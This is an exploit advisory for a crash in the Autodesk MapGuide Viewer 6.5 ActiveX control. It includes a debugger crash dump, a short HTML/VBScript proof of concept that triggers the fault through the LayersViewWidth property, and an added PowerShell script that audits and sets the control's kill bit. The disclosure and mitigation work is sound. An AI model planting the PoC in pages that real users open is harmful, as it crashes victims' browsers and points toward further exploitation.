Autodesk MapGuide Viewer ActiveX Denial of Service Vulnerability
Source: vfocus.net  Author: d3b4g  Published: 2010-09-02

 
# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys

 

 

Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)

Seh Chain:
--------------------------------------------------
1  192847C  MGAXCTRL.DLL
2  73352542  VBSCRIPT.dll
3  7C839AD8  KERNEL32.dll

 

Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644

 

ArgDump:
--------------------------------------------------
EBP+8 003EB644 -> 0193F90C
EBP+12 00000000
EBP+16 0013EAD4 -> 00130000
EBP+20 0042C4F4 -> 00110024
EBP+24 0013EA94 -> 0013EAD4
EBP+28 0013EB30 -> 0013EBC0


Block Disassembly:
--------------------------------------------------
175CE8F POP ESI
175CE90 JMP [EAX+60]
175CE93 PUSH ESI
175CE94 LEA ESI,[ECX+404]
175CE9A TEST ESI,ESI
175CE9C JE SHORT 0175CEC2
175CE9E CMP DWORD PTR [ESI+1C],0   <--- CRASH
175CEA2 JE SHORT 0175CEC2
175CEA4 PUSH 0
175CEA6 PUSH DWORD PTR [ESP+C]
175CEAA MOV ECX,ESI
175CEAC PUSH 0
175CEAE CALL 01912C63
175CEB3 MOV EAX,[ESI]
175CEB5 MOV ECX,ESI

 

 

PoC:


<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype  = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid     = "MGMapControl.MGMap"
argCount   = 1

arg1=0

target.LayersViewWidth = arg1

</script>
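
Mitigation check (an added example, not part of the original advisory or of Autodesk's guidance): the script below reports whether the control with the CLSID used in the PoC is registered on a host and whether its Internet Explorer kill bit is set, and sets it when run elevated with -Apply. The script structure and the -Apply switch are assumptions of this example; the CLSID is taken from the PoC above.

```powershell
# Added example: audit (and optionally set) the IE kill bit for the MapGuide Viewer control.
param([switch]$Apply)   # -Apply is this example's own switch; requires an elevated session

$clsid   = '{62789780-B744-11D0-986B-00609731A21D}'   # CLSID from the PoC's <object> tag
$killBit = 0x400                                      # "Compatibility Flags" kill-bit value
$views   = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

# 1. Is the control registered at all? Report the DLL path from InprocServer32.
foreach ($root in 'HKLM:\SOFTWARE\Classes\CLSID', 'HKLM:\SOFTWARE\Wow6432Node\Classes\CLSID') {
    $k = Join-Path $root "$clsid\InprocServer32"
    if (Test-Path -LiteralPath $k) {
        [pscustomobject]@{ RegisteredUnder = $root; Server = (Get-Item -LiteralPath $k).GetValue('') }
    }
}

# 2. Check the kill bit in each registry view; set it only when -Apply is given.
foreach ($view in $views) {
    # The Wow6432Node view does not exist on 32-bit Windows; skip it there.
    if (-not (Test-Path -LiteralPath (Split-Path $view -Parent))) { continue }

    $key   = Join-Path $view $clsid
    $flags = 0
    if (Test-Path -LiteralPath $key) {
        $v = (Get-Item -LiteralPath $key).GetValue('Compatibility Flags')
        if ($null -ne $v) { $flags = [int]$v }
    }

    $set = ($flags -band $killBit) -ne 0
    if (-not $set -and $Apply) {
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        $flags = $flags -bor $killBit   # preserve any other flags already present
        Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Type DWord -Value $flags
        $set = $true
    }
    [pscustomobject]@{ View = $view; Flags = ('0x{0:X8}' -f $flags); KillBitSet = $set }
}
```

The kill bit only stops Internet Explorer from instantiating the control; hosts that do not need the viewer are better served by uninstalling it.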


 